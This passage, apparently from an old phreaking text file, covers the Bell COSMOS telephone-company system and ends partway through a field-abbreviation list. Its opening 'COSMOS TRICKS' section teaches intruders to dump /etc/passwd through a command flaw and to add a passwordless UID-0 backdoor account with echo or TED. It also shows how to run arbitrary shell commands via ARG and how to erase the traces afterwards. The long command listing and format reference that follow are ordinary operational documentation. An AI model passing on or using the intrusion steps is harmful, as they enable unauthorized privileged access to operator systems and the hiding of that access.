+There are about one hundred other COSMOS commands that are all defined at the
+end of this file.  I cannot go into detail on all of them but I will list them
+and their meanings.
+=============================================================================
+COSMOS TRICKS
+Even if you don't have full COSNIX access, you can basically execute
+any command or read any file that exists in the system.  Using the INQ
+(or ISH) command and redirection, you can open and display any file.
+EX:  To display the password file
+WC% INQ </ETC/PASSWD
+This will display the file, however, since this is a flaw in the command,
+it thinks the file is to be input for INQ, and each line will be preceded
+with "ILLEGAL LINE TYPE", but this can be ignored.
+Other files to look at:
+/USR/FACS/WCFILE     List of all Wire Centers
+/ETC/MATRIX.P        Permission Matrix (Who can execute what commands)
+You may or may not want to try the following.  There is a high probability
+that you will be noticed on the system.  If your local COSMOS ports are
+usually left logged in, don't bother doing this.  However, if your COSMOS
+ports are always logged out, and you almost never get in, and you happen
+to stumble upon one left logged for the first time in months, it might be
+worth a try.
+There are a few ways to make a new account on COSMOS; however, you need to
+be able to write to the password file.  Some systems allow this, but most do
+not.
+The easiest way involves using the echo command and redirection.
+EX:
+WC% echo "EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so" >>/etc/passwd
+This will add user EB01 to the end of the password file.
+If you do not have access to echo you can do the same thing using the TED
+command (Text Editor).
+WC% TED >>/etc/passwd
+S.O. NO.= SO123456
+IS THIS A NEW S.O. (Y on NO) Y
+1d
+a
+EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so
+^C
+1p
+w
+q
+After executing the above, you will need to clean up the /etc/passwd
+file to remove the Service Order information put in there by TED.  You will
+also need to remove the service order you created from the /usr/so/WC
+directory.
+If you cannot find a way to get shell access, you can still execute
+any COSNIX command you desire again using TED, MSK (Output a Transaction
+Mask), and ARG (Assemble and Run a Given Master File).
+EX:
+WC% TED
+S.O. NO.= SO123456
+IS THIS A NEW S.O. (Y or NO) Y
+12
+1d
+a
+$*
+run!
+^c
+w
+q
+WC% MSK >/usr/so/newcmd
+SO123456
+WC% ARG
+newcmd ls /etc
+To execute the command, you need to do ARG, then the name of the
+file (which I called newcmd), then the COSNIX command you wish to
+execute.
+If you can use echo this can be done much easier.
+EX:
+WC% echo '$*' >/usr/so/newcmd
+WC% echo 'run!' >>/usr/so/newcmd
+Then you can run your command normally with ARG.
+WC% ARG
+newcmd cd ..
+IF you do not have access to echo, create a newcmd file and you can use it
+that way.
+WC% ARG
+newcmd echo EB01::0::y:1:/tmp:/usr/cosmos:/usr/so:/usr/preop >>/etc/passwd
+=============================================================================
+COSMOS COMMAND LISTING
+ACE  Establish an Assignment Change Ticket
+AIT  ANALIT Initialization of Tables
+ARG  Assemble and Run a Given Master File
+AUD  Assignment List Audit
+BAI  Bridge Lifter Assignment Inquiry
+BYF  Display the Bypass File
+BYP  Change the Contents of the Bypass File
+CAY  Create an Assembly
+CCA  Change Customer Attributes
+CCT  Initialize and Update the Contractor-Transducer File
+CDA  Change Distribution Attributes
+CDD  Change Due Date
+CDR  Cut Thru DIP Report
+CFA  Change Facility Attributes
+CFP  Print the Class of Service/Features for an Electromechanical Entity
+CFU  Change Facility Usage
+CIE  Company Establish Company Initiated Change
+CLI  COSMOS Processed ALIT Reports
+CPI  COSMOS-PREMIS Interface
+CPM  COSMOS Performance Monitor
+CTC  Complete a Cable Transfer or Complete a Cable Throw
+CTE  Cable Throw Order Establishment
+CTF  Display the Contacter-Transducer File
+CTL  Cable Throw with Line Equipment Assignment
+CTM  Cable Throw Modification
+CTP  Print Cable Transfer Frame Work
+CTR  Cable Throw Replacement
+CTS  Cable Throw Summary
+CTW  Withdraw a Cable Transfer or a Cable Throw
+CUP  Common Update Processor
+CXC  Complex Service Order Input Checker
+CXM  Centrex Table Management
+CXT  Complex Order Inquiry for NAC Review
+DAY  Delete an Assembly
+DBL  Data Base Load
+DCN  List Disconnected and Changed Numbers
+DDS  Display the DS Table
+DIR  Standard DIP Report
+DPN  DIP Purge Number
+DPR  DIP Report and Removal
+DQR  Design Quota System Report
+DQS  Design Quota System
+DTE  Print Current Date
+EDZ  Facility Emergency Assignment List
+ELA  Entity Load Analysis
+ESP  Print Entire Summary Table
+FDY  Set Fiscal Day for LAC
+FLR  Frame Layout Report
+FOR  Frame Order Report
+FOS  Frame Operations Summary
+FTA  Frame Transfer Analysis
+FTC  Frame Transfer Completion
+FTE  Frame Transfer Establishment
+FTL  Frame Transfer LETs
+FTR  Frame Transfer Reprint
+FTW  Frame Transfer Withdrawal
+FWM  Frame Work Management
+GFR  General Facility Report
+GLA  Generate Lists for Assignment
+HBS  Hunt Group Blocks of Spares
+HGR  Hunt Group Report
+HGS  Hunt Group Summary
+HIS  Hunting ISH
+IJR  Input a Jeopardy Reason
+IMU  Input Measured CCS Usage Data
+INQ  Complete Circuit Inquiry
+ISF  Inquire on a Single Facility
+ISH  Complete Circuit Inquiry Short
+JAM  Jumper Activity Management
+JPH  Jumper Placement History
+KPR  Killer Pair Report
+KSM  Create a Transaction Mask
+LAI  Line Equipment Assignment Inquiry
+LBP  Load Balance Parameters
+LCD  LIST Cable Summary, LIT Demand Test
+LCP  List Cable Pairs
+LEE  NAC Related Line Equipment Transfer Order Establishment
+LEW  Line Equipment Transfer Withdrawal
+LFC  Load Factor Calculation
+LFR  Line Failure Report
+LGN  List Hunt Groups
+LIN  Transmit ALIT Data to COSMOS
+LOE  List Originating Line Equipment
+LSE  Line and Station Transfer Order Establishment
+LSW  Line and Station transfer Withdrawal
+LTN  List Telephone Numbers
+MAL  Manual Assignment List
+MAP  Manual Assignment Parameters
+MAQ  Manual Assignment File Inquiry
+MAY  Modify an Assembly
+MCE  Establish a Maintenance Change Ticket
+MCH  Manually Change Hunt
+MCL  Maintenance Change List
+MCR  Establish a Maintenance Change Repair
+MCW  Maintenance Change Ticket Withdrawal
+MDC  Manually Disconnect a Working Circuit
+MEC  Manually Establish a Circuit
+MMC  Manually Modify a Circuit
+MOC  MOE Order Completion
+MOE  Mass OE Transfers
+MOF  Mass OE Frame Transfer Listings
+MOW  MOE Order Withdrawal
+MPK  Modify Work Package
+MSK  Output a Transaction Mask
+MTR  Manually Test a Response
+NAI  Telephone Number Assignment Inquiry
+NOL  NAC Service Order Listing
+NSD  Number Summary Display
+OIJ  Orders in Jeopardy
+OPN  Open-of-Day Report
+OPU  Outside Plant Cable Usage
+PAK  Work Packages
+PEP  Position Establishment for Parties
+PFR  Party Line Fill Report
+PRP  Periodic Purging of Remarks
+QEX  Question an Execution
+QUE  Queue
+RAL  Relay Assignment List
+RAP  Relay Assignment Parameters
+RAS  Release Sequence Number Lists and Related TN/OE
+RBS  Print TBS Relays Assignment Record
+RCP  Recent Change Packager
+RCR  Recent Change Report
+RCS  Recent Change Summary
+RED  Recent Change Message Text Editor
+REL  Release Non-Intercepted Numbers by Release Date
+REM  Remove Frame Locations
+RET  Retermination of Frame Locations
+REX  Reexecute a Service Order
+RJR  Remove Jeopardy Reason Codes
+RMP  Recent Change Punctuation Table
+RNA  Release Telephone Numbers for Assignment
+ROE  Reservation Order Establishment
+ROI  Reservation Order Inquiry
+ROW  Reservation Order Withdrawal
+RTH  Report Transaction to Count Spare and DIPed Line Equipment
+RTS  Relay and Telephone Number Status Report
+RUP  Request Unsolicited Processing
+SAI  Summary of Action Items
+SCA  Service Order Completion-Automatic
+SCF  Simple Completion for MDF
+SCI  Spare Cable Pair Inquiry
+SCM  Standard Completion by MDF
+SCP  Service Order Completion by LAC
+SCR  Standard Completion by RCMAC
+SEL  Selecting Lines for an Exchange Class of Service Study
+SET  Statistics on Equipment and Telephone Numbers
+SGH  Supply Relays for Groups of 5XB Hunts
+SIR  Sorting Inquiry by Range
+SLC  Subscriber Line Counts for Custom Calling Features
+SOC  Service Order Cancel
+SOE  Service Order Establishment
+SOF  Service Order Fix
+SOH  Service Order Withheld
+SOI  Service Order Assignment Inquiry
+SOL  Service Order Listing
+SOM  Modify a Pending Service Order
+SOW  Service Order Withdrawal
+STN  Summarize Telephone Numbers
+SVL  Service Observing Loops
+TAI  Tie Pair Assignment Inquiry
+TAT  Test Alignment of Frame Terminal
+TED  Text Editor
+TET  Display or Change Band Filter File, Retention Factor and Print Threshold
+TFC  Transfer Frame Changes
+TIG  Dial Transfer Input Generator
+TLC  Translate LANAVAR/CPS
+TNS  Telephone Number Swap
+TOC  Transfer Order Completion
+TOE  Transfer Order Establishment
+TOF  Mass OE Transfer Order Frame Listings
+TOI  Dial Transfer Order Inquiry
+TOL  Transfer Order Lists
+TOO  Transfer Order Omissions
+TOW  Transfer Order Withdrawal
+TPU  Tie Pair Usage Report
+TRC  Transfer Order Recent Change Report
+TRI  Transmission Equipment Assignment Inquiry
+TRW  Total Reservation Order Withdrawal
+TSL  Line Equipment Summary Report
+TSN  Traffic Statistics on Telephone Numbers
+TSW  Total Service Order Withdrawal
+TTY  Get TTY Name
+TXC  Text Checker
+TXM  Transfer Centrex Management
+UDP  Update DIP Parameters
+UES  Update the Entity Summary Table
+UFO  Unprinted Frame Orders
+UPC  Update CCS vs. Class of Service Table
+USL  List USOC (US) File Data
+UTC  Update Table for Concentrator Redesign
+WCC  Change Wire Center
+WCT  Worksheet for Cable Throw Orders
+WFL  Working Frame Location
+WOI  Work Order Inquiry
+WOL  Work Order Listing
+WPT  Work Package Table
+WSL  Work Status List
+WUL  Work Unit Report for Subscriber Line Testing and Installation Assignment
+=============================================================================
+COSMOS ABBREVIATIONS AND FORMATS
+The following will be given as follows:
+Prefix and Meaning
+Format
+Code Value and Meaning
+AC   Assembly category
+     AC XXXX
+     PERM=Permanent Facility Assemblies
+     TEMP=Temporary Facility Assemblies
+AC   Assembly Code
+     AC XXX
+     XXX=1-999
+ADSR Administration of Designed Services Review
+     ADSR X
+     Y=Yes, TIRKS Circuit
+     N=No, COSMOS Circuit
+AGM  Normal Aging Months
+     AGM XX
+     XX=Number of Months
+AGT  Accelerated Aging Type
+     AGT XXX
+     BUS=Business
+     RES=Residential
+AI   Assigner's Initials
+     AI XXX
+     XXX=3 Alphanumeric Characters
+AO   Allocation Order
+     AO XX
+     XX=Two Numeric Characters
+AR   Advance Relay
+     AR XYY-ZZZ
+     X=Marker Group
+     YY=Number Group from Frame
+     ZZZ=Relay Number
+ATN  Assigner's Telephone Number
+     ATN XXX-XXXX
+     XXX-XXXX=Assigners TN
+BL   Bridge Lifter
+     BL XX...XX
+     XX...XX=Maximum of 17 Alphanumeric Characters
+BLS  Bridge Lifter Status
+     BLS X
+     Y=Yes
+     N=No
+BND  Band Number
+     BND X
+     X=0-3
+BTN  Billing Telephone Number
+     BTN XXX-XXXX
+     XXX-XXXX=Billing Telephone Number
+CA   Cable Number
+     CA XX...XX
+     XX...XX=Maximum of 10 Alphanumeric Characters
+CAT  Centrex Access Treatment
+     CAT XX
+     XX=Maximum of 2 Numeric Characters
+CC   Call Count
+     CC XX
+     XX=Maximum of 2 Numeric Characters
+CCF  Custom Calling Features
+     CCF XXXXXX
+     XXXXXX=3 to 6 Alphanumeric Characters
+CCS  Hundred Call Seconds
+     CCS XXXX
+     XXXX=3 or 4 Numeric Characters
+CEU  CCS Estimated Usage
+     CEU XXXX
+     XXXX=3 or 4 Numeric Characters
+CG   Control Group Number
+     CG X
+     X=0-9
+CKID Circuit Identification
+     CKID XX...XX
+     XX..XX=Maximum of 61 Alphanumeric Characters
+CKL  Circuit Location
+     CKL XXXX
+     XXXX=Maximum of 4 Alphanumeric Characters
+CLC  Common Language Code for an Entity
+     CLC XX...XX
+     XX...XX=Maximum of 11 Alphanumeric Characters
+CLCI Common Language Circuit Identification
+     CLCI XX...XX
+     XX...XX=Maximum of 61 Alphanumeric Characters
+CLEI Common Language Equipment Identifier
+     CLEI XX...XX
+     XX...XX=Maximum of 10 Alphanumeric Characters
+CLF  Creating DIPs Upper Bound Load Factor
+     CLF XX
+     XX=1-10
+CLL  Creating DIPs Lower Bound Load Factor
+     CLF X
+     X=1-9
+CLS  CLCI in Serial Number Format
+     CLS XX...XX
+     XX..XX=Maximum of 61 Alphanumeric Characters
+CLT  CLCI Telephone Number Format
+     CLT XX...XX
+     XX...XX=Maximum of 61 Alphanumeric Characters
+CMF  Capacity Main Station Fill
+     CMF XXXXXX
+     XXXXXX=Maximum of 6 Numeric Characters
+CMU  CCS Measured Usage
+     CMU XXXX
+     XXXX=3 or 4 Numeric Characters
+COM  Complement Size
+     COM XXXX
+     XXXX=1-9999
+CON  Concentrator
+     CON XX-YY
+     XX=Maximum of 2 Alphanumeric Characters
+     YY=Maximum of 2 Numeric Characters
+CP   Cable and Pair Number
+     CP XX...XX-YZZZ
+     XX...XX=Cable ID, Maximum of 10 Alphanumeric Characters
+     YZZZ=Cable Pair ID
+     Y=Alphanumeric
+     ZZZ=Numeric
+CPU  CCS Capacity Usage
+     CPU XXXX
+     XXXX=3 or 4 Numeric Characters
+CRG  CREG Tag
+     CRG XXX
+     XXX=YES or NO
+CS   Customer Class of Service
+     CS XXXXXX
+     XXXXXX=Maximum of 6 Alphanumeric Characters
+CTID Circuit Termination Identification
+     CTID XX...XX
+     XX...XX=Maximum of 61 Alphanumeric Characters
+CTT  Cut Through Tag
+     CTT XXX
+     XXX=YES or NO
+CTX  Centrex Group Number
+     CTX XXXX
+     XXXX=Maximum of 4 numeric Characters
+DC   Dial Code
+     DC X
+     X=1 Alpha Characters
+DD   Due Date
+     DD MM-DD-YY
+     MM=Month
+     DD=Day
+     YY=Year
+DID  Direct Inward Dialing
+     DID XXXX
+     XXXX=Maximum of 4 Numeric Characters
+DIP  DIP Creation Option
+     DIP X
+     Y=Yes
+     N=No
+DNY  Denial of Service for Non-payments
+     DNY X
+     I=Incoming
+     O=Outgoing
+     B=Both
+DPA  Different Premises Address
+     DPA XXX
+     XXX=Maximum of 3 Alphanumeric Characters
+DPT  Department Name
+     DPT XXX
+     XXX=Maximum of 3 Alphanumeric Characters
+DST  Destination of Order Response
+     DST XXXX
+     XXXX=Maximum of 4 Alphanumeric Characters
+DT   Due Time
+     DT XX
+     XX=AM, PM, or 0-9
+EC   ESS Entity and Control Group Number
+     EC YZ
+     Y=Entity Number
+     Z=Control Group Identifier
+ECS  Equipment Class of Service
+     ECS XXXXXX
+     XXXXXX=Maximum of 6 Alphanumeric Characters
+ED   Enter Date
+     ED MM-DD-YY
+     MM=Month
+     DD=Day
+     YY=Year
+EN   Entity
+     EN X
+     X=S, E, 1, 5 or 0
+EN   Entity Number
+     EN X
+     X=0-9
+ENT  Entity Number
+     ENT X
+     X=0-9
+EO   Error Handling Option
+     EO XX
+     CE=Continue Processing and Establish Valid Circuits
+     CW=Continue Processing and Withdraw Established Circuits
+     SE=Stop Processing and Establish Valid Circuits
+     SW=Stop Processing and Withdraw Established Circuits
+EQF  Equipment Features
+     EQF WXYZ
+     W=R (Rotary) or T (Touchtone)
+     Y=S (Sleeve) X (Range Extension) or N (Non-sleeve or Non-range Extension)
+     X=E (Essential) or N (Non-essential)
+     Z=G (Ground Start) or L (Loop Start)
+EQV  Frame Equivalence
+     EQV FXX
+     F=The Letter "F"
+     XX=Two Alphanumeric Characters
+ETC  Estimated Trunk CCS Value
+     ETC XXXX
+     XXXX=Maximum of 4 Alphanumeric Characters
+EXD  ECS Crossloading Option
+     EXD XXX
+     XXX=YES or NO
+FAC  Type of Segment List Being Audited
+     FAC XX
+     TN=Telephone Number
+     OE=Line Equipment
+FAC  Circuit Confiruration
+     FAC XXX          or
+     FAC TN-NNX       or
+     FAC CP-XX...X    or
+     FAC SE-YY...Y    or
+     FAC PL-ZZ...Z
+     XXX=Any Facility Prefix
+     NNX=Three Alphanumeric Characters
+     XX...XX=Maximum of 10 Alphanumeric Characters
+     YY...YY=Maximum of 52 Alphanumeric Characters
+     ZZ...ZZ=Maximum of 61 Alphanumeric Characters
+FC   From Cable
+     FC XX...XX
+     XX...XX=Maximum of 10 Alphanumeric Characters
+FDD  Frame Due Date
+     FDD MM-DD-YY
+     MM=Month
+     DD=Day
+     YY=Year
+FEA  Customer Feature
+     FEA XXXX
+     (Same as EQF)
+FILT Filter
+     FILT XXX
+     XXX=Y, YES, N, or NO
+FR   Frame Identification
+     FR FXX
+     F=The letter "F"
+     XX=Two Alphanumeric Characters
+FT   Frame Time
+     FT XX
+     XX=01-24
+FW   MDF Output Suppressed
+     FW X
+     Y=Frame Work Yes
+     N=Frame Work No
+GP   MLHG Group Number
+     GP Y-XXXX
+     Y=Alphanumeric Control Group
+     XXXX=Numeric Group Number
+GSO  Ground Start Option
+     GSO X
+     1=Assigned to any OE in the Entity
+     2=Assigned to Even Levels
+     3=Only Assigned to OE Specified as Ground Start
+HC   Hunt Count
+     HC XXXX
+     XXXX=Maximum of 4 Numeric Characters
+HF   Hunt-from Telephone Number
+     HF XXX-XXXX
+     XXX-XXXX=Telephone Number
+HLC  Highest Lead Factor Group Count
+     HLC XXXX
+     XXXX=1-9999
+HR   Held Order Reason Code
+     HR XX
+     CE=Equipment Shortage
+     CF=Lack of Facility
+     CL=Plant Load
+     CO=General Company Reasons
+     C1-C5-Additional Company Reasons
+     SA=Subscriber Access
+     SL=Subscriber Requested Later Date
+     SO=General Subscriber Reasons
+     SR=Subscriber Not Ready
+     S1-S5=Additional General Subscriber Reasons
+HRS  Hours Prefix
+     HRS XX
+     XX=01-24
+HT   Hunt-to Telephone Number
+     HT XXX-XXXX
+     XXX-XXXX=Telephone Number
+HTG  Hunt-to Group Number
+     HTG Y-XXXX
+     Y=Alphanumeric Control Group
+     XXXX=Numeric Group Number
+HTX  Hunt-to X Number
+     HTX XXX-YYXX of
+     HTX XXX-YXX
+     Y=Alphanumeric
+     X=Numeric
+INIT Allocation Table Initalization
+     INIT
+     (No Data Entry)
+ITM  Cable Pair Item Number
+     ITM XX
+     XX=Two Numeric Characters
+JL   Jumper Length
+     JL XXX
+     XXX=Maximum of 3 Numeric Characters
+JR   Jeopardy Reason
+     JR XX
+     A1=Assignment Error on CP
+     A2=Assignment Error on OE
+     A3=Assignment Error on TN
+     A4-A9=Other Assignment Error
+     C1=No SSWO for Circuit Design Group
+     C2-C9=Local Code for Circuit Design Group
+     E1-E9=No ESS Translations
+     IB=No Installation Go-ahead for Business
+     IC=No Installation Go-ahead for Coin
+     ID=No Installation Go-ahead for Data
+     IR=No Installation Go-ahead for Residence
+     IS-No Installation Go-ahead for Special
+     I1-I4=Local Codes foir No Installation Go-ahead
+     RB=Business RSB
+     RC=Coin RSB
+     RD=Data RSB
+     RR=Residence RSB
+     RS=Special RSB
+     R1-R4=Local Use for RSB
+LC   Output Line Count
+     LC XXXX
+     XXXX=0-9999
+LC   Line Count
+     LC XXX
+     XXX=0-999
+LC   Pending Service Order Count
+     LC
+     (No Data Entry)
+LCC  Line Class Code
+     LCC XXX
+     XXX Maximum of 3 Alphanumeric Characters
+LD   Loading Division
+     LD XX
+     XX=Two Numeric Characters
+LDN  Listed Directory Number
+     LDN XXX-XXXX
+     XXX-XXXX=Telephone Number
+LF   Load Factor
+     LF XX
+     XX=1-10
+LIM  Less Than the Specified Number of Pairs
+     LIM XX
+     XX=0-50
+LIM  High Limit on Number of Specified Status Pairs in a Complement
+     LIM XX
+     XX=0-50
+LIM  Low Limit on Number of Spare Line Equipment in Vertical Files
+     LIM XX
+     LIM=1-10
+LLC  Low Load Group Count
+     LLC XXXX
+     XXXX=0-9999
+LOC  Location
+     LOC FXXYYY
+     F=The Letter "F"
+     XX=Alphanumeric
+     YYY=001-999
+LP   Loop Range
+     LP XXX;XXX
+     XXX;XXX=Six Numeric Characters
+LS   List New Pending Cable Transfers
+     LS XXX
+     XXX=NEW
+LTI  Loop Termination Identifier
+     LTI XXX
+     XXX=Three Alphanumeric Characters
+MASK Office Equipment Mask
+     MASK OE ID
+     ID=XXX-XXX-XXX    =1ESS
+     ID=XXX-XXXX       =2ESS
+     ID=XXX-XXXX       =3ESS
+     ID=XXXX-XXX-XX    =5ESS
+     ID=XXXX-XX-XX     =5ESS
+     ID=XXXX-X-XXXX    =RSS
+     ID=XXXX-XXX-XX    =1XB
+     ID=XXXX-XXXX-XX   =1XB
+     ID=XXX-XX-XX      =5XB
+     ID=XXXX-XXX       =SXS
+     ID=XXX-X-XX-X     =DMS-10
+     ID=XXX-X-XX-XX    -DMS-100
+     X=Alphanumeric
+MAT  Manual Assistance Tag
+     MAT XXX
+     XXX=YES or NO
+MAX  Maximum Percentage Value of Entity Fill or Maximum CCS Value
+     MAX XXX
+     XXX=Maximum of 3 Numeric Characters
+MBL  Mini-bridge Lifter Tag
+     MBL XX
+     Y=MBL Working on CP
+     N=CP Can't Support MBL
+     EQ=CP has MBL Capabilities
+MC   Marker Class of Service
+     MC XX
+     XX=Two Alphanumeric Characters
+MF   Recent Change Message Format
+     MF XXXX
+     NEW=RX:LINE:messages
+     OUT=RC:LINE:OUT:messages
+     CHG=RC:LINE:CHG:messages
+     SUSP=RC:LINE:CHG:messages of suspended service
+MF   Jumper Listing for MDF
+     MF XXX
+     NEW=Running Jumper Listing
+     DJ=Dead Jumper Listing
+MF   Message Format When Completing Transfer Circuits with TOC
+     MF XXX
+     ALL=Message is Printed for Every Circuit in Range
+     ERR=Message Printed Only for Circuits not Completed
+MF   Message Format for Dial Transfer Number Lists
+     MF XXX
+     GVR=Transaction GFR Output Format, One Facility per Line
+     LVT=Line Verification Test Format
+     TLC=Two-line Condensed Format
+MG   Marker Group Number
+     MG X
+     X=0-9
+MIN  Minimum Percentage Value of Entity Fill or Minimum CCS Value
+     MIN XXX
+     XXX=Maximum of 3 Numeric Characters
+MLP  Multi-loop Resistance Zone Threshold
+     MLP XX
+     XX=Two Numeric Characters
+MOD  Module Number
+     MOD XXX
+     XXX=Three Numeric Characters
+MODE Integrated SLC No. 5ESS Mode
+     MODE X
+     1=5 T1 Carrier Channels
+     2=3 T1 Carrier Channels
+MPN  Master Work Package Number
+     MPN XXXX
+     XXXX=1-9999
+MR   Message Register
+     MR XXXXXX
+     XXXXXX=Maximum of 6 Alphanumeric Characters
+MRO  Message Register Option
+     MRO XXX
+     XXX=YES or NO
+MT   Master Record Tape Unit Number or Tape Drive to Write
+     MT X
+     X=Numeric
+MTR  Tape Drive to Read
+     MTR X
+     X=Numeric
+MTW  Tape Drive to Write
+     MTW X
+     X=Numeric
+NAR  NAC Assignment Review
+     NAR XXX
+     XXX=Maximum of 3 Numeric Characters
+NGF  Number Group Frame for 5XB
+     NGF XXX
+     XXX=Three Numeric Characters
+NNX  Telephone Exchange Code
+     NNX XXX
+     XXX=THree Numeric Characters
+NOE  Number of OEs to be Assigned
+     NOE X
+     X=0 or 1
+NPA  Area Code and Exchange Number
+     NPA XXXXXX
+     XXXXXX=Six Alphanumeric Characters
+NRM  Normalizing CCS VAlue
+     NRM XX
+     XX=0-99
+NTN  Number of TNs to be Assigned
+     NTN X
+     X=0 or 1
+OA   Line Equipment Assignment Option
+     OA X
+     Y=Yes
+     N=No
+OC   Order Category
+     OC XXX
+     ACT=Assignment Change Ticket
+     ALL=All OE Load Factors
+     CPC=Special Service
+     FM=Count Since OE Input Features Occurrences
+     FO=Count All OE Input Feature Occurrences
+     HOT=Frame Ouput-urgent
+     JR=Jeopardy Reason
+OCS  Old Class of Service
+     OCS XXXXXX
+     XXXXXX=Maximum of 6 Alphanumeric Characters
+OD   Output Device
+     OD XXXX
+     TT=Send Output to Current Terminal
+     TTXX=Send Output to Specified Terminal XX
+     MTX=Send Output to Magnetic Tape X
+OE   Office Equpiment Number
+     OE ID
+     (See MASK)
+OGO  Outgoing Only Trunk
+     OGO XXX
+     XXX=Maximum of 4 Numeric Characters
+OPT  Party Assignment Option
+     OPT X
+     1=Assign Multi-party Customers to Spare Party Equipment
+     2=Assign Multi-party Customer to Partially Equipped Party Equipment
+     3=Assign Only One Multi-Party Customer to each Single Party Equipment
+ORD  Service or Work Order
+     ORD XX...XX
+     XX...XX=Maximum of 20 Alphanumeric Characters
+OT   Service or Work Order Type
+     OT XXX
+     BT=Background Transfer
+     CD=Complete Disconnect
+     CH=Changed
+     CIO=Company Initiated Orders
+     F="FROM"
+     LET=Line Equipment Transfers
+     LST=Line and Station Transfers
+     MCE=Maintenance Change by LAC
+     MCR=Maintenance Change by Repair
+     MCT=All Maintenance Changes
+     NC=New Connect
+     R=Remarks
+     REA=Pending Reassociation
+     SW=Swap
+     T="TO"
+PBX  Private Branch Exchange
+     PBX XXXX
+     XXXX=Maximum of 4 Numeric Characters
+PCID Primary Circuit Identification
+     PCID XX...XX
+     XX...XX=Maximum of 61 Alphanumeric Characters
+PKT  Picket Fence Values
+     PKT XXX.X,...,XXX.X
+     XXX.X,...,XXX.X=Nine sets of Four Numeric Characters or
+     N=No New Values
+PL   Private line Circuit Number
+     PL XX...XX
+     XX...XX=Maximum of 61 Alphanumeric Characters
+PNL  PREMIS Number List for TN
+     PNL XX...XX
+     XX...XX=Maximum of 12 Alphanumeric Characters
+POP  Line Equipment Print Option
+     POP XXX
+     CNC=Concentrator-1ESS, 2ESS, 3ESS, RSS
+     CNG=Concentrator Group-2ESS, 3ESS
+     HG=Horizontal Group-5XBAR
+     IM=Interface Module-5ESS
+     LFG=Line Finder Group-SXS
+     LLF=Line Link Frame-5XBAR
+     LLN=Line Link Net-1ESS
+     LTN=Line Trunk Net-2ESS
+     LU=Link Unit Module-5ESS
+     QC=Quarter Choice-1XBAR
+     SW=Switch-1XBAR
+     VF=Vertical FIle-5XBAR
+PR   Cable Pair ID
+     PR YXXX
+     Y=Alphanumeric
+     XXX=Numeric
+PRI  Frame Priority
+     PRI XX
+     XX=Two Numeric Characters
+PRP  Permanent Cable Pair Remarks
+     PRP XX...XX
+     XX...XX=Maximum of 14 Alphanumeric Characters
+PRZ  Preferred Rate Zone
+     PRT X
+     X=Numeric
+PS   Previously Published/Non-published Facility Indicator
+     PS X
+     N=Non-Published
+     !=Published
+PT   Package Time
+     PT XXX
+     XXX=Three Numeric Characters
+PTY  Party Number or Position
+     PTY X
+     X=1-4
+PTY  Party Indicator
+     PTY X
+     R=Reserved
+     O=Open
+PWC  PREMIS Wire Center
+     PWC XX...XX
+     XX...XX=Maximum of 8 Alphanumeric Characters
+PWC  Print Work Code
+     PWC XXX
+     NBT=No Back Tap
+     COM=Frame Complete
+     PBT=Print Back Tap
+     RCT=Place Heat Coils on "TO" Pair
+     RBT=Remove Back Tap
+     RCF=Remove Heat Coils on "FROM" Pair
+     VBT=Verify Back Tap
+     USX=Locally Defined Codes (X=1-4)
+RAP  Rotary Assignment Priority
+     RAP X
+     X=Numeric
+RCT  Recent Change Type
+     RCT XX
+     1=1ESS Office
+     1A=1AESS Office
+     2=2ESS (LO1)
+     2E=2ESS (EF1 and EF2)
+     3=3ESS
+     5T=5ESS
+RCW  Recent Change Keyword
+     RCW XX...XX
+     XX...XX=Maximum of 20 Alphanumeric Characters
+RD   Release Date
+     RD MM-DD-YY
+     MM=Month
+     DD=Day
+     YY=Year
+RDG  Message Register Reading
+     RDG XXXX
+     XXXX=Four Numeric Characters
+REC  Record File Name and Number
+     REC FFXXXXXX
+     FF=File Name (Alphanumeric)
+     XXXXXX=Record Number (Maximum of 6 Numeric Characters)
+REP  Reprint Option
+     REP X
+     Y=Yes
+     N=No
+RESP Send a Solicited Response
+     RESP X
+     S=Solicited Response
+REW  Rework Status
+     REW X
+     Y=Yes
+     N=No
+RLF  Re-using DIPs Upper Bound Load Factor
+     RLF X
+     X=1-9
+RLO  Automatic Relay Assignment Present
+     RLO X
+     Y=Yes
+     N=No
+RLY  Miscellaneous Relay
+     RLY XX...XX
+     XX...XX=Maximum of 10 Alphanumeric Characters
+RMK  Remarks on Orders
+     RMK XX...XX
+     XX...XX=Maximum of 28 Alphanumeric Characters
+RMKG Hunt Group Remarks
+     RMKG XX...XX
+     XX...XX=Maximum of 30 Alphanumeric Characters
+RMKO Remarks on Office Equipment
+     RMKO XX...XX
+     XX...XX=Maximum of 12 Alphanumeric Characters
+RMKP Remarks on Cable Pair
+     RMKP XX...XX
+     XX...XX=Maximum of 14 Alphanumeric Characters
+RMKT Remarks on Telephone Number
+     RMKT XX...XX
+     XX...XX=Maximum of 14 Alphanumeric Characters
+RNO  RSS Subentity Number
+     RNO XX
+     XX=01-63
+RTI  Route Index
+     RTI XXXX
+     XXXX=Maximum of 4 Numeric Characters
+RTYP Relay Type
+     RTYP XXX
+     TBA=Tens Block Auxiliary
+     SC=Sleeve Connect
+     AR=Advance
+RTZ  Rate Zone
+     RTZ X
+     X=Numeric
+RW   Recent Change Work
+     RW X
+     N=Recent Change Message not Required
+     C=Recent Change Coordination Required
+RZ   Resistance Zone
+     RZ XX
+     XX=Two Numeric Characters
+SBS  Sub-status
+     SBS X
+     A=Area Transfer
+     C=Cut Through
+     D=Dedicated
+     L=Cut Through and Dedicated
+     !=Blank
+SC   Sleeve Connect Relay
+     SC SYY-ZZZ
+     S=Marker Group (Numeric)
+     YY=Number Group Frame (Numeric)
+     ZZZ=Relay Number (Numeric)
+SE   Special Service Equipment Number
+     SE XX...XX
+     XX...XX=Maximum of 52 Alphanumeric Characters
+SET  Single Entity Tag
+     SET X
+     Y=CP is Served by a Single Entity on a Single Frame
+     !=CP Can be Served by More Than One Entity
+SG   Service Segment
+     SG X
+     B=Business
+     C=Coin
+     D=Data
+     R=Residence
+     S=Special
+SGN  Common Language Segment Number
+     SGN XXX
+     XXX=Maximum of 3 Alphanumeric Characters
+SIS  Special Identifying Telephone Number Supplement
+     SIS XXXX
+     XXXX=Maximum of 4 Numeric Characters
+SIT  Special Identifying Telephone Number
+     SIT XXX-YYY-XXXX
+     X=Numeric
+     Y=Numeric
+SK   Skip Option
+     SK X
+     X=0 or 2-9
+SN   Sequence Number
+     SN XXX
+     XXX=1-999
+SOB  Service Observing Tag
+     SOB XXX
+     XXX=YES or NO
+SS   Suspension Status
+     SS XX
+     DB=Deny Both Ways
